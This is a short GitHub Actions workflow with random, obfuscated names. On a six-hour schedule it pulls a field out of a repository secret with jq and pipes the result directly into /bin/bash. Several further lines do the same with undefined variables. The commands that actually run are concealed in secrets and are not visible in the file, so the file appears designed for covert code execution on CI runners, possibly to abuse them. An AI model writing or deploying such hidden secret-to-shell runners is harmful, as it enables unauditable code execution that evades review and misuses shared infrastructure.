name: wenhaoxuan3191

on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wenhaoxuan3191
        env:
          zcng5: ${{ secrets.zcng5 }}
        run: |
          echo $zcng5 | jq -r .g63547 | /bin/bash
          echo $w0 | jq -r .ueaq24907 | /bin/bash
          echo $jolfe014 | jq -r .awhar4180 | /bin/bash
          echo $lqwhy47002 | jq -r .wpgx40 | /bin/bash
          echo $xuj54 | jq -r .kigmd20083 | /bin/bash

